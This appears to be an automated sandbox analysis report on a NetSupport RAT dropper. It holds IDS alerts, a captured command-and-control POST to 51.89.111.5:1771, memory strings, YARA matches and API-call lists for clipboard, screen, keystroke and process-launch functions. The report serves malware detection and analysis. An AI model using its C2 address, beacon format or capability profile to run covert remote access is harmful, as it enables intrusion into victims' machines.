Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49976 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49965 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49977 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49975 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49977 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49974 -> 51.89.111.5:1771

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771

Source: global traffic

TCP traffic: 192.168.2.7:49700 -> 51.89.111.5:1771

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49728
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49939

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: pbkvithtosh07.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: client32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: client32.exe, 00000003.00000002.3708134074.0000000002940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.89.111.5/fakeurl.htm
Source: client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/
Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspj
Source: client32.exe, 00000003.00000003.1324775977.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1569692989.0000000005B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspl
Source: client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asps
Source: client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.e
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: client32.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/rpa0

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

3_2_1101FC20

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110335A0 GetClipboardFormatNameA,SetClipboardData,	3_2_110335A0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	3_2_1101FC20
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110335A0 GetClipboardFormatNameA,SetClipboardData,	11_2_110335A0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	11_2_1101FC20

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,

3_2_11033320

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

3_2_110077A0

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		3_2_11114590
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		11_2_11114590

Source: Yara match	File source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.hkpqXovZtS.exe.6728888.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hkpqXovZtS.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		3_2_111165C0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		11_2_111165C0

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004D0FDC NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004D0FDC
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004D103C NtFreeVirtualMemory,	0_2_004D103C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0044E465 NtQueryInformationProcess,	0_2_0044E465
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0044E492 NtQueryInformationProcess,	0_2_0044E492
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004D106C NtQuerySystemInformation,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtClose,NtSetContextThread,NtClose,NtClose,	0_2_004D106C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004DD291 NtSetInformationThread,	0_2_004DD291
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0229110B NtCreateFile,	0_2_0229110B
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022911EE NtReadFile,__allrem,__allrem,NtSetInformationFile,	0_2_022911EE

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11113190: GetKeyState,DeviceIoControl,keybd_event,

3_2_11113190

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

